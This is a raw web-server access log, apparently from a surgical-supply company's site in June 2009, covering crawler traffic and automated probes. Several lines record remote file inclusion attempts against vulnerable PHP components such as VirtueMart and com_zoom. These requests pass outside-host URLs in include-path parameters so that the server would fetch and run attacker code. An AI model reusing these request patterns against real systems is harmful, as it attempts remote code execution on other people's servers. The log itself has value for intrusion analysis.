66.249.71.54 - - [12/Jun/2009:02:18:10 -0400] "GET /images/_notes/home_welcome1.gif.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.198.32.3 - - [12/Jun/2009:02:18:14 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:02:18:14 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:02:18:15 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:02:18:20 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
66.249.71.54 - - [12/Jun/2009:02:18:21 -0400] "GET /images/_notes/ace_bkgrd_wide.jpg.mno HTTP/1.1" 200 266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:18:30 -0400] "GET /images/_notes/nav04_shop_off.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:18:39 -0400] "GET /images/_notes/nav04_home_off.jpg.mno HTTP/1.1" 200 257 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:18:50 -0400] "GET /images/_notes/nav_lower_blue.jpg.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:18:55 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:18:59 -0400] "GET /images/_notes/nav_lower_bgrd.jpg.mno HTTP/1.1" 200 266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:19:02 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:19:03 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:19:09 -0400] "GET /images/_notes/nav_upper_bgrd.jpg.mno HTTP/1.1" 200 265 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:19:18 -0400] "GET /images/_notes/download_cat_X.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:19:28 -0400] "GET /images/_notes/nav_store_head.jpg.mno HTTP/1.1" 200 253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:19:38 -0400] "GET /images/_notes/nav04_login_off.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:19:47 -0400] "GET /images/_notes/ACE_HQ_vignette.jpg.mno HTTP/1.1" 200 174 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:19:57 -0400] "GET /images/_notes/nav_store_index.jpg.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:20:07 -0400] "GET /images/_notes/ace_logo_bottom.jpg.mno HTTP/1.1" 200 251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:20:16 -0400] "GET /images/_notes/ace_bkgrd_white.jpg.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:20:19 -0400] "GET /logs/access_log.Q109052900/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:02:20:19 -0400] "GET /logs/access_log.Q109052400/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:20:26 -0400] "GET /images/_notes/nav04_home_over.jpg.mno HTTP/1.1" 200 257 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:20:36 -0400] "GET /images/_notes/nav04_shop_over.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:20:46 -0400] "GET /images/_notes/nav04_about_off.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:20:50 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:20:50 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:20:50 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:20:54 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:20:55 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:20:55 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:20:55 -0400] "GET /images/_notes/download_get_it.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:20:59 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:20:59 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:20:59 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
74.6.22.170 - - [12/Jun/2009:02:21:03 -0400] "GET /logs/error_log.Q108032400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:21:04 -0400] "GET /images/_notes/circle_CD_video.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:21:15 -0400] "GET /images/_notes/home_connect_off.gif.mno HTTP/1.1" 200 253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:21:24 -0400] "GET /images/_notes/nav_home_temp_on.jpg.mno HTTP/1.1" 200 251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [12/Jun/2009:02:21:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [12/Jun/2009:02:21:30 -0400] "GET /logs/access_log.Q109051000%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:02:21:30 -0400] "GET /logs/access_log.Q109051800%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.811"
66.249.71.54 - - [12/Jun/2009:02:21:33 -0400] "GET /images/_notes/download_tut_PRP.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:21:44 -0400] "GET /images/_notes/home_connect_off.jpg.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:21:44 -0400] "GET /logs/access_log.Q109052400/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:02:21:47 -0400] "GET /logs/access_log.Q109060500%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:21:53 -0400] "GET /images/_notes/circle_arrow_off.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:22:03 -0400] "GET /images/_notes/store_anim_r2_c1.gif.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:22:05 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.217.242.2 - - [12/Jun/2009:02:22:10 -0400] "GET //index.php?pagina=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
124.217.242.2 - - [12/Jun/2009:02:22:10 -0400] "GET /logs//index.php?pagina=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
124.217.242.2 - - [12/Jun/2009:02:22:10 -0400] "GET /logs/access_log.Q109052500//index.php?pagina=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
66.249.71.54 - - [12/Jun/2009:02:22:12 -0400] "GET /images/_notes/circle_CD_coming.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:22:22 -0400] "GET /images/_notes/banner_store_off.jpg.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.198.32.3 - - [12/Jun/2009:02:22:26 -0400] "GET /logs/access_log.Q109052800%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
66.249.71.54 - - [12/Jun/2009:02:22:32 -0400] "GET /images/_notes/contact_fax_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:22:41 -0400] "GET /images/_notes/nav04_conven_off.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:22:51 -0400] "GET /images/_notes/nav04_manage_off.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:22:52 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:23:01 -0400] "GET /images/_notes/nav04_login_over.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.70.103.140 - - [12/Jun/2009:02:23:07 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:23:10 -0400] "GET /images/_notes/nav04_about_over.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.223.3.98 - - [12/Jun/2009:02:23:14 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:02:23:14 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:02:23:14 -0400] "GET /logs/access_log.Q109052900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:02:23:19 -0400] "GET /logs/access_log.Q109052400//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.217.242.2 - - [12/Jun/2009:02:23:19 -0400] "GET /logs/access_log.Q109052500//index.php?pagina=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
124.217.242.2 - - [12/Jun/2009:02:23:19 -0400] "GET //index.php?pagina=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
66.128.53.115 - - [12/Jun/2009:02:23:19 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
124.217.242.2 - - [12/Jun/2009:02:23:19 -0400] "GET /logs//index.php?pagina=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
66.128.53.115 - - [12/Jun/2009:02:23:19 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:23:19 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:23:19 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:23:19 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:23:20 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:23:20 -0400] "GET /images/_notes/circle_about_off.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.217.242.2 - - [12/Jun/2009:02:23:23 -0400] "GET /logs/access_log.Q109010700//index.php?pagina=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
66.128.53.115 - - [12/Jun/2009:02:23:24 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:23:25 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:23:25 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:23:30 -0400] "GET /images/_notes/download_bonetack.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:23:32 -0400] "GET /logs/access_log.Q109052900/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:23:40 -0400] "GET /images/_notes/home_connect_over.gif.mno HTTP/1.1" 200 253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:23:44 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:23:46 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:23:46 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:23:49 -0400] "GET /images/_notes/download_order_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:23:58 -0400] "GET /images/_notes/ace_logo_top_over.jpg.mno HTTP/1.1" 200 180 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:24:09 -0400] "GET /images/_notes/download_order_it.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.217.242.2 - - [12/Jun/2009:02:24:16 -0400] "GET /logs/access_log.Q109010700//index.php?pagina=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
194.127.8.17 - - [12/Jun/2009:02:24:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible;)"
194.127.8.17 - - [12/Jun/2009:02:24:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible;)"
194.127.8.19 - - [12/Jun/2009:02:24:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AGIS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)"
194.127.8.19 - - [12/Jun/2009:02:24:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AGIS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)"
66.249.71.54 - - [12/Jun/2009:02:24:18 -0400] "GET /images/_notes/banner_store_over.jpg.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.170 - - [12/Jun/2009:02:24:19 -0400] "GET /logs/ HTTP/1.0" 200 5170 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:24:28 -0400] "GET /images/_notes/nav04_manage_over.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:24:37 -0400] "GET /images/_notes/nav_store_fav_grn.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:24:38 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:24:38 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:24:38 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:24:38 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:24:38 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:24:38 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:24:47 -0400] "GET /images/_notes/contact_mail_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:24:51 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:24:51 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:24:51 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:24:57 -0400] "GET /images/_notes/download_EZPRP_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:24:59 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:24:59 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:00 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
218.249.36.194 - - [12/Jun/2009:02:25:01 -0400] "GET /logs/access_log.Q109052400/index.php?inc_dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:25:01 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:01 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:02 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:03 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:03 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:03 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:25:06 -0400] "GET /images/_notes/home_shopping_off.gif.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:25:13 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
